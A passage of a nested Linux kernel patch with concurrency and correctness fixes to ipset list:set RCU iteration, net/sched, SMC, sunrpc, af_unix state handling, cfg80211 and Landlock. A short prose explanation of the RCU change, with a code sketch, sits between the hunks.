++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -99,7 +99,7 @@ list_set_kdel(struct ip_set *set, const struct sk_buff *skb,
+ 	struct set_elem *e;
+ 	int ret;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -188,9 +188,10 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 	struct list_set *map = set->data;
+ 	struct set_adt_elem *d = value;
+ 	struct set_elem *e, *next, *prev = NULL;
+-	int ret;
++	int ret = 0;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	rcu_read_lock();
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -201,6 +202,7 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 
+ 		if (d->before == 0) {
+ 			ret = 1;
++			goto out;
+ 		} else if (d->before > 0) {
+ 			next = list_next_entry(e, list);
+ 			ret = !list_is_last(&e->list, &map->members) &&
+@@ -208,9 +210,11 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 		} else {
+ 			ret = prev && prev->id == d->refid;
+ 		}
+-		return ret;
++		goto out;
+ 	}
+-	return 0;
++out:
++	rcu_read_unlock();
++	return ret;
+ }
+ 
+ static void
+@@ -239,7 +243,7 @@ list_set_uadd(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 
+ 	/* Find where to add the new entry */
+ 	n = prev = next = NULL;
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -316,9 +320,9 @@ list_set_udel(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ {
+ 	struct list_set *map = set->data;
+ 	struct set_adt_elem *d = value;
+-	struct set_elem *e, *next, *prev = NULL;
++	struct set_elem *e, *n, *next, *prev = NULL;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_safe(e, n, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -424,14 +428,8 @@ static void
+ list_set_destroy(struct ip_set *set)
+ {
+ 	struct list_set *map = set->data;
+-	struct set_elem *e, *n;
+ 
+-	list_for_each_entry_safe(e, n, &map->members, list) {
+-		list_del(&e->list);
+-		ip_set_put_byindex(map->net, e->id);
+-		ip_set_ext_destroy(set, e);
+-		kfree(e);
+-	}
++	WARN_ON_ONCE(!list_empty(&map->members));
+ 	kfree(map);
+ 
+ 	set->data = NULL;
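
Matching the deferred destruction above, the list:set lookup paths switch to list_for_each_entry_rcu() so a lockless reader never follows a next pointer into freed memory; only the mutating delete path keeps the _safe variant. A minimal reader/updater sketch with hypothetical names (entry_matches, free_entry_rcu):

    /* Reader: may run concurrently with removal. */
    rcu_read_lock();
    list_for_each_entry_rcu(e, &map->members, list) {
        if (entry_matches(e, key))
            break;
    }
    rcu_read_unlock();

    /* Updater (under the set lock): unlink first, then free after a
     * grace period so the reader above never touches freed memory.
     */
    list_del_rcu(&e->list);
    call_rcu(&e->rcu, free_entry_rcu);
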
+diff --git a/net/sched/sch_multiq.c b/net/sched/sch_multiq.c
+index 75c9c860182b4..0d6649d937c9f 100644
+--- a/net/sched/sch_multiq.c
++++ b/net/sched/sch_multiq.c
+@@ -185,7 +185,7 @@ static int multiq_tune(struct Qdisc *sch, struct nlattr *opt,
+ 
+ 	qopt->bands = qdisc_dev(sch)->real_num_tx_queues;
+ 
+-	removed = kmalloc(sizeof(*removed) * (q->max_bands - q->bands),
++	removed = kmalloc(sizeof(*removed) * (q->max_bands - qopt->bands),
+ 			  GFP_KERNEL);
+ 	if (!removed)
+ 		return -ENOMEM;
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 1d4638aa4254f..41187bbd25ee9 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -938,16 +938,13 @@ static int taprio_parse_mqprio_opt(struct net_device *dev,
+ {
+ 	int i, j;
+ 
+-	if (!qopt && !dev->num_tc) {
+-		NL_SET_ERR_MSG(extack, "'mqprio' configuration is necessary");
+-		return -EINVAL;
+-	}
+-
+-	/* If num_tc is already set, it means that the user already
+-	 * configured the mqprio part
+-	 */
+-	if (dev->num_tc)
++	if (!qopt) {
++		if (!dev->num_tc) {
++			NL_SET_ERR_MSG(extack, "'mqprio' configuration is necessary");
++			return -EINVAL;
++		}
+ 		return 0;
++	}
+ 
+ 	/* Verify num_tc is not out of max range */
+ 	if (qopt->num_tc > TC_MAX_QUEUE) {
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index b6609527dff62..e86db21fef6e5 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -462,29 +462,11 @@ static int smc_bind(struct socket *sock, struct sockaddr *uaddr,
+ static void smc_adjust_sock_bufsizes(struct sock *nsk, struct sock *osk,
+ 				     unsigned long mask)
+ {
+-	struct net *nnet = sock_net(nsk);
+-
+ 	nsk->sk_userlocks = osk->sk_userlocks;
+-	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK) {
++	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK)
+ 		nsk->sk_sndbuf = osk->sk_sndbuf;
+-	} else {
+-		if (mask == SK_FLAGS_SMC_TO_CLC)
+-			WRITE_ONCE(nsk->sk_sndbuf,
+-				   READ_ONCE(nnet->ipv4.sysctl_tcp_wmem[1]));
+-		else
+-			WRITE_ONCE(nsk->sk_sndbuf,
+-				   2 * READ_ONCE(nnet->smc.sysctl_wmem));
+-	}
+-	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK) {
++	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK)
+ 		nsk->sk_rcvbuf = osk->sk_rcvbuf;
+-	} else {
+-		if (mask == SK_FLAGS_SMC_TO_CLC)
+-			WRITE_ONCE(nsk->sk_rcvbuf,
+-				   READ_ONCE(nnet->ipv4.sysctl_tcp_rmem[1]));
+-		else
+-			WRITE_ONCE(nsk->sk_rcvbuf,
+-				   2 * READ_ONCE(nnet->smc.sysctl_rmem));
+-	}
+ }
+ 
+ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+diff --git a/net/sunrpc/auth_gss/auth_gss.c b/net/sunrpc/auth_gss/auth_gss.c
+index 2d7b1e03110ae..3ef511d7af190 100644
+--- a/net/sunrpc/auth_gss/auth_gss.c
++++ b/net/sunrpc/auth_gss/auth_gss.c
+@@ -1858,8 +1858,10 @@ gss_wrap_req_priv(struct rpc_cred *cred, struct gss_cl_ctx *ctx,
+ 	offset = (u8 *)p - (u8 *)snd_buf->head[0].iov_base;
+ 	maj_stat = gss_wrap(ctx->gc_gss_ctx, offset, snd_buf, inpages);
+ 	/* slack space should prevent this ever happening: */
+-	if (unlikely(snd_buf->len > snd_buf->buflen))
++	if (unlikely(snd_buf->len > snd_buf->buflen)) {
++		status = -EIO;
+ 		goto wrap_failed;
++	}
+ 	/* We're assuming that when GSS_S_CONTEXT_EXPIRED, the encryption was
+ 	 * done anyway, so it's safe to put the request on the wire: */
+ 	if (maj_stat == GSS_S_CONTEXT_EXPIRED)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d2a3b42b456a..3905cdcaa5184 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -221,15 +221,9 @@ static inline int unix_may_send(struct sock *sk, struct sock *osk)
+ 	return unix_peer(osk) == NULL || unix_our_peer(sk, osk);
+ }
+ 
+-static inline int unix_recvq_full(const struct sock *sk)
+-{
+-	return skb_queue_len(&sk->sk_receive_queue) > sk->sk_max_ack_backlog;
+-}
+-
+ static inline int unix_recvq_full_lockless(const struct sock *sk)
+ {
+-	return skb_queue_len_lockless(&sk->sk_receive_queue) >
+-		READ_ONCE(sk->sk_max_ack_backlog);
++	return skb_queue_len_lockless(&sk->sk_receive_queue) > sk->sk_max_ack_backlog;
+ }
+ 
+ struct sock *unix_peer_get(struct sock *s)
+@@ -518,9 +512,9 @@ static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
+ 	return 0;
+ }
+ 
+-static int unix_writable(const struct sock *sk)
++static int unix_writable(const struct sock *sk, unsigned char state)
+ {
+-	return sk->sk_state != TCP_LISTEN &&
++	return state != TCP_LISTEN &&
+ 	       (refcount_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf;
+ }
+ 
+@@ -529,7 +523,7 @@ static void unix_write_space(struct sock *sk)
+ 	struct socket_wq *wq;
+ 
+ 	rcu_read_lock();
+-	if (unix_writable(sk)) {
++	if (unix_writable(sk, READ_ONCE(sk->sk_state))) {
+ 		wq = rcu_dereference(sk->sk_wq);
+ 		if (skwq_has_sleeper(wq))
+ 			wake_up_interruptible_sync_poll(&wq->wait,
+@@ -554,11 +548,10 @@ static void unix_dgram_disconnected(struct sock *sk, struct sock *other)
+ 		 * when peer was not connected to us.
+ 		 */
+ 		if (!sock_flag(other, SOCK_DEAD) && unix_peer(other) == sk) {
+-			other->sk_err = ECONNRESET;
++			WRITE_ONCE(other->sk_err, ECONNRESET);
+ 			sk_error_report(other);
+ 		}
+ 	}
+-	other->sk_state = TCP_CLOSE;
+ }
+ 
+ static void unix_sock_destructor(struct sock *sk)
+@@ -605,7 +598,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+ 	state = sk->sk_state;
+-	sk->sk_state = TCP_CLOSE;
++	WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 
+ 	skpair = unix_peer(sk);
+ 	unix_peer(sk) = NULL;
+@@ -626,8 +619,8 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 			unix_state_lock(skpair);
+ 			/* No more writes */
+ 			WRITE_ONCE(skpair->sk_shutdown, SHUTDOWN_MASK);
+-			if (!skb_queue_empty(&sk->sk_receive_queue) || embrion)
+-				skpair->sk_err = ECONNRESET;
++			if (!skb_queue_empty_lockless(&sk->sk_receive_queue) || embrion)
++				WRITE_ONCE(skpair->sk_err, ECONNRESET);
+ 			unix_state_unlock(skpair);
+ 			skpair->sk_state_change(skpair);
+ 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
+@@ -727,7 +720,8 @@ static int unix_listen(struct socket *sock, int backlog)
+ 	if (backlog > sk->sk_max_ack_backlog)
+ 		wake_up_interruptible_all(&u->peer_wait);
+ 	sk->sk_max_ack_backlog	= backlog;
+-	sk->sk_state		= TCP_LISTEN;
++	WRITE_ONCE(sk->sk_state, TCP_LISTEN);
++
+ 	/* set credentials so connect can copy them */
+ 	init_peercred(sk);
+ 	err = 0;
+@@ -966,7 +960,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern,
+ 	sk->sk_hash		= unix_unbound_hash(sk);
+ 	sk->sk_allocation	= GFP_KERNEL_ACCOUNT;
+ 	sk->sk_write_space	= unix_write_space;
+-	sk->sk_max_ack_backlog	= net->unx.sysctl_max_dgram_qlen;
++	sk->sk_max_ack_backlog	= READ_ONCE(net->unx.sysctl_max_dgram_qlen);
+ 	sk->sk_destruct		= unix_sock_destructor;
+ 	u = unix_sk(sk);
+ 	u->inflight = 0;
+@@ -1390,7 +1384,8 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr,
+ 		if (err)
+ 			goto out_unlock;
+ 
+-		sk->sk_state = other->sk_state = TCP_ESTABLISHED;
++		WRITE_ONCE(sk->sk_state, TCP_ESTABLISHED);
++		WRITE_ONCE(other->sk_state, TCP_ESTABLISHED);
+ 	} else {
+ 		/*
+ 		 *	1003.1g breaking connected state with AF_UNSPEC
+@@ -1407,13 +1402,20 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr,
+ 
+ 		unix_peer(sk) = other;
+ 		if (!other)
+-			sk->sk_state = TCP_CLOSE;
++			WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 		unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer);
+ 
+ 		unix_state_double_unlock(sk, other);
+ 
+-		if (other != old_peer)
++		if (other != old_peer) {
+ 			unix_dgram_disconnected(sk, old_peer);
++
++			unix_state_lock(old_peer);
++			if (!unix_peer(old_peer))
++				WRITE_ONCE(old_peer->sk_state, TCP_CLOSE);
++			unix_state_unlock(old_peer);
++		}
++
+ 		sock_put(old_peer);
+ 	} else {
+ 		unix_peer(sk) = other;
+@@ -1461,7 +1463,6 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	struct sk_buff *skb = NULL;
+ 	long timeo;
+ 	int err;
+-	int st;
+ 
+ 	err = unix_validate_addr(sunaddr, addr_len);
+ 	if (err)
+@@ -1520,7 +1521,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	if (other->sk_shutdown & RCV_SHUTDOWN)
+ 		goto out_unlock;
+ 
+-	if (unix_recvq_full(other)) {
++	if (unix_recvq_full_lockless(other)) {
+ 		err = -EAGAIN;
+ 		if (!timeo)
+ 			goto out_unlock;
+@@ -1545,9 +1546,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 
+ 	   Well, and we have to recheck the state after socket locked.
+ 	 */
+-	st = sk->sk_state;
+-
+-	switch (st) {
++	switch (READ_ONCE(sk->sk_state)) {
+ 	case TCP_CLOSE:
+ 		/* This is ok... continue with connect */
+ 		break;
+@@ -1562,7 +1561,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 
+ 	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+-	if (sk->sk_state != st) {
++	if (sk->sk_state != TCP_CLOSE) {
+ 		unix_state_unlock(sk);
+ 		unix_state_unlock(other);
+ 		sock_put(other);
+@@ -1614,7 +1613,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	copy_peercred(sk, other);
+ 
+ 	sock->state	= SS_CONNECTED;
+-	sk->sk_state	= TCP_ESTABLISHED;
++	WRITE_ONCE(sk->sk_state, TCP_ESTABLISHED);
+ 	sock_hold(newsk);
+ 
+ 	smp_mb__after_atomic();	/* sock_hold() does an atomic_inc() */
+@@ -2009,7 +2008,7 @@ static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			unix_peer(sk) = NULL;
+ 			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
+ 
+-			sk->sk_state = TCP_CLOSE;
++			WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 			unix_state_unlock(sk);
+ 
+ 			unix_dgram_disconnected(sk, other);
+@@ -2185,7 +2184,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	}
+ 
+ 	if (msg->msg_namelen) {
+-		err = sk->sk_state == TCP_ESTABLISHED ? -EISCONN : -EOPNOTSUPP;
++		err = READ_ONCE(sk->sk_state) == TCP_ESTABLISHED ? -EISCONN : -EOPNOTSUPP;
+ 		goto out_err;
+ 	} else {
+ 		err = -ENOTCONN;
+@@ -2397,7 +2396,7 @@ static int unix_seqpacket_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	if (err)
+ 		return err;
+ 
+-	if (sk->sk_state != TCP_ESTABLISHED)
++	if (READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)
+ 		return -ENOTCONN;
+ 
+ 	if (msg->msg_namelen)
+@@ -2411,7 +2410,7 @@ static int unix_seqpacket_recvmsg(struct socket *sock, struct msghdr *msg,
+ {
+ 	struct sock *sk = sock->sk;
+ 
+-	if (sk->sk_state != TCP_ESTABLISHED)
++	if (READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)
+ 		return -ENOTCONN;
+ 
+ 	return unix_dgram_recvmsg(sock, msg, size, flags);
+@@ -2683,18 +2682,18 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 		if (skb == u->oob_skb) {
+ 			if (copied) {
+ 				skb = NULL;
+-			} else if (sock_flag(sk, SOCK_URGINLINE)) {
+-				if (!(flags & MSG_PEEK)) {
++			} else if (!(flags & MSG_PEEK)) {
++				if (sock_flag(sk, SOCK_URGINLINE)) {
+ 					WRITE_ONCE(u->oob_skb, NULL);
+ 					consume_skb(skb);
++				} else {
++					__skb_unlink(skb, &sk->sk_receive_queue);
++					WRITE_ONCE(u->oob_skb, NULL);
++					unlinked_skb = skb;
++					skb = skb_peek(&sk->sk_receive_queue);
+ 				}
+-			} else if (flags & MSG_PEEK) {
+-				skb = NULL;
+-			} else {
+-				__skb_unlink(skb, &sk->sk_receive_queue);
+-				WRITE_ONCE(u->oob_skb, NULL);
+-				unlinked_skb = skb;
+-				skb = skb_peek(&sk->sk_receive_queue);
++			} else if (!sock_flag(sk, SOCK_URGINLINE)) {
++				skb = skb_peek_next(skb, &sk->sk_receive_queue);
+ 			}
+ 		}
+ 
+@@ -2711,7 +2710,7 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 
+ static int unix_stream_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+-	if (unlikely(sk->sk_state != TCP_ESTABLISHED))
++	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED))
+ 		return -ENOTCONN;
+ 
+ 	return unix_read_skb(sk, recv_actor);
+@@ -2735,7 +2734,7 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
+ 	size_t size = state->size;
+ 	unsigned int last_len;
+ 
+-	if (unlikely(sk->sk_state != TCP_ESTABLISHED)) {
++	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -3060,7 +3059,7 @@ long unix_inq_len(struct sock *sk)
+ 	struct sk_buff *skb;
+ 	long amount = 0;
+ 
+-	if (sk->sk_state == TCP_LISTEN)
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN)
+ 		return -EINVAL;
+ 
+ 	spin_lock(&sk->sk_receive_queue.lock);
+@@ -3172,15 +3171,17 @@ static int unix_compat_ioctl(struct socket *sock, unsigned int cmd, unsigned lon
+ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wait)
+ {
+ 	struct sock *sk = sock->sk;
++	unsigned char state;
+ 	__poll_t mask;
+ 	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 	shutdown = READ_ONCE(sk->sk_shutdown);
++	state = READ_ONCE(sk->sk_state);
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask |= EPOLLERR;
+ 	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+@@ -3199,14 +3200,14 @@ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wa
+ 
+ 	/* Connection-based need to check for termination and startup */
+ 	if ((sk->sk_type == SOCK_STREAM || sk->sk_type == SOCK_SEQPACKET) &&
+-	    sk->sk_state == TCP_CLOSE)
++	    state == TCP_CLOSE)
+ 		mask |= EPOLLHUP;
+ 
+ 	/*
+ 	 * we set writable also when the other side has shut down the
+ 	 * connection. This prevents stuck sockets.
+ 	 */
+-	if (unix_writable(sk))
++	if (unix_writable(sk, state))
+ 		mask |= EPOLLOUT | EPOLLWRNORM | EPOLLWRBAND;
+ 
+ 	return mask;
+@@ -3217,15 +3218,18 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
+ {
+ 	struct sock *sk = sock->sk, *other;
+ 	unsigned int writable;
++	unsigned char state;
+ 	__poll_t mask;
+ 	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 	shutdown = READ_ONCE(sk->sk_shutdown);
++	state = READ_ONCE(sk->sk_state);
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+@@ -3241,19 +3245,14 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	/* Connection-based need to check for termination and startup */
+-	if (sk->sk_type == SOCK_SEQPACKET) {
+-		if (sk->sk_state == TCP_CLOSE)
+-			mask |= EPOLLHUP;
+-		/* connection hasn't started yet? */
+-		if (sk->sk_state == TCP_SYN_SENT)
+-			return mask;
+-	}
++	if (sk->sk_type == SOCK_SEQPACKET && state == TCP_CLOSE)
++		mask |= EPOLLHUP;
+ 
+ 	/* No write status requested, avoid expensive OUT tests. */
+ 	if (!(poll_requested_events(wait) & (EPOLLWRBAND|EPOLLWRNORM|EPOLLOUT)))
+ 		return mask;
+ 
+-	writable = unix_writable(sk);
++	writable = unix_writable(sk, state);
+ 	if (writable) {
+ 		unix_state_lock(sk);
+ 
+diff --git a/net/unix/diag.c b/net/unix/diag.c
+index 3438b7af09af5..1de7500b41b61 100644
+--- a/net/unix/diag.c
++++ b/net/unix/diag.c
+@@ -65,7 +65,7 @@ static int sk_diag_dump_icons(struct sock *sk, struct sk_buff *nlskb)
+ 	u32 *buf;
+ 	int i;
+ 
+-	if (sk->sk_state == TCP_LISTEN) {
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN) {
+ 		spin_lock(&sk->sk_receive_queue.lock);
+ 
+ 		attr = nla_reserve(nlskb, UNIX_DIAG_ICONS,
+@@ -103,8 +103,8 @@ static int sk_diag_show_rqlen(struct sock *sk, struct sk_buff *nlskb)
+ {
+ 	struct unix_diag_rqlen rql;
+ 
+-	if (sk->sk_state == TCP_LISTEN) {
+-		rql.udiag_rqueue = sk->sk_receive_queue.qlen;
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN) {
++		rql.udiag_rqueue = skb_queue_len_lockless(&sk->sk_receive_queue);
+ 		rql.udiag_wqueue = sk->sk_max_ack_backlog;
+ 	} else {
+ 		rql.udiag_rqueue = (u32) unix_inq_len(sk);
+@@ -136,7 +136,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb, struct unix_diag_r
+ 	rep = nlmsg_data(nlh);
+ 	rep->udiag_family = AF_UNIX;
+ 	rep->udiag_type = sk->sk_type;
+-	rep->udiag_state = sk->sk_state;
++	rep->udiag_state = READ_ONCE(sk->sk_state);
+ 	rep->pad = 0;
+ 	rep->udiag_ino = sk_ino;
+ 	sock_diag_save_cookie(sk, rep->udiag_cookie);
+@@ -165,7 +165,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb, struct unix_diag_r
+ 	    sock_diag_put_meminfo(sk, skb, UNIX_DIAG_MEMINFO))
+ 		goto out_nlmsg_trim;
+ 
+-	if (nla_put_u8(skb, UNIX_DIAG_SHUTDOWN, sk->sk_shutdown))
++	if (nla_put_u8(skb, UNIX_DIAG_SHUTDOWN, READ_ONCE(sk->sk_shutdown)))
+ 		goto out_nlmsg_trim;
+ 
+ 	if ((req->udiag_show & UDIAG_SHOW_UID) &&
+@@ -215,7 +215,7 @@ static int unix_diag_dump(struct sk_buff *skb, struct netlink_callback *cb)
+ 		sk_for_each(sk, &net->unx.table.buckets[slot]) {
+ 			if (num < s_num)
+ 				goto next;
+-			if (!(req->udiag_states & (1 << sk->sk_state)))
++			if (!(req->udiag_states & (1 << READ_ONCE(sk->sk_state))))
+ 				goto next;
+ 			if (sk_diag_dump(sk, skb, req, sk_user_ns(skb->sk),
+ 					 NETLINK_CB(cb->skb).portid,
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 3fcddc8687ed4..22f67b64135d2 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -427,7 +427,7 @@ static void cfg80211_wiphy_work(struct work_struct *work)
+ 	if (wk) {
+ 		list_del_init(&wk->entry);
+ 		if (!list_empty(&rdev->wiphy_work_list))
+-			schedule_work(work);
++			queue_work(system_unbound_wq, work);
+ 		spin_unlock_irq(&rdev->wiphy_work_lock);
+ 
+ 		wk->func(&rdev->wiphy, wk);
+diff --git a/net/wireless/pmsr.c b/net/wireless/pmsr.c
+index 2bc647720cda5..d26daa0370e71 100644
+--- a/net/wireless/pmsr.c
++++ b/net/wireless/pmsr.c
+@@ -56,7 +56,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.burst_period = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD])
+ 		out->ftm.burst_period =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD]);
++			nla_get_u16(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD]);
+ 
+ 	out->ftm.asap = !!tb[NL80211_PMSR_FTM_REQ_ATTR_ASAP];
+ 	if (out->ftm.asap && !capa->ftm.asap) {
+@@ -75,7 +75,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.num_bursts_exp = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP])
+ 		out->ftm.num_bursts_exp =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP]);
+ 
+ 	if (capa->ftm.max_bursts_exponent >= 0 &&
+ 	    out->ftm.num_bursts_exp > capa->ftm.max_bursts_exponent) {
+@@ -88,7 +88,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.burst_duration = 15;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION])
+ 		out->ftm.burst_duration =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION]);
+ 
+ 	out->ftm.ftms_per_burst = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_FTMS_PER_BURST])
+@@ -107,7 +107,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.ftmr_retries = 3;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES])
+ 		out->ftm.ftmr_retries =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES]);
+ 
+ 	out->ftm.request_lci = !!tb[NL80211_PMSR_FTM_REQ_ATTR_REQUEST_LCI];
+ 	if (out->ftm.request_lci && !capa->ftm.request_lci) {
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index a88f338c61d31..17ccb9c6091e8 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -5,7 +5,7 @@
+  *
+  * Copyright 2005-2006	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2006	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2020-2021, 2023 Intel Corporation
++ * Copyright (C) 2020-2021, 2023-2024 Intel Corporation
+  */
+ 
+ #include <linux/device.h>
+@@ -137,7 +137,7 @@ static int wiphy_resume(struct device *dev)
+ 	if (rdev->wiphy.registered && rdev->ops->resume)
+ 		ret = rdev_resume(rdev);
+ 	rdev->suspended = false;
+-	schedule_work(&rdev->wiphy_work);
++	queue_work(system_unbound_wq, &rdev->wiphy_work);
+ 	wiphy_unlock(&rdev->wiphy);
+ 
+ 	if (ret)
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index f433f3fdd9e94..73b3648e1b4c3 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -2202,6 +2202,7 @@ int cfg80211_get_station(struct net_device *dev, const u8 *mac_addr,
+ {
+ 	struct cfg80211_registered_device *rdev;
+ 	struct wireless_dev *wdev;
++	int ret;
+ 
+ 	wdev = dev->ieee80211_ptr;
+ 	if (!wdev)
+@@ -2213,7 +2214,11 @@ int cfg80211_get_station(struct net_device *dev, const u8 *mac_addr,
+ 
+ 	memset(sinfo, 0, sizeof(*sinfo));
+ 
+-	return rdev_get_station(rdev, dev, mac_addr, sinfo);
++	wiphy_lock(&rdev->wiphy);
++	ret = rdev_get_station(rdev, dev, mac_addr, sinfo);
++	wiphy_unlock(&rdev->wiphy);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(cfg80211_get_station);
+ 
+diff --git a/security/landlock/fs.c b/security/landlock/fs.c
+index d328965f32f7f..7b0e5976113c2 100644
+--- a/security/landlock/fs.c
++++ b/security/landlock/fs.c
+@@ -824,6 +824,7 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	bool allow_parent1, allow_parent2;
+ 	access_mask_t access_request_parent1, access_request_parent2;
+ 	struct path mnt_dir;
++	struct dentry *old_parent;
+ 	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS] = {},
+ 		     layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS] = {};
+ 
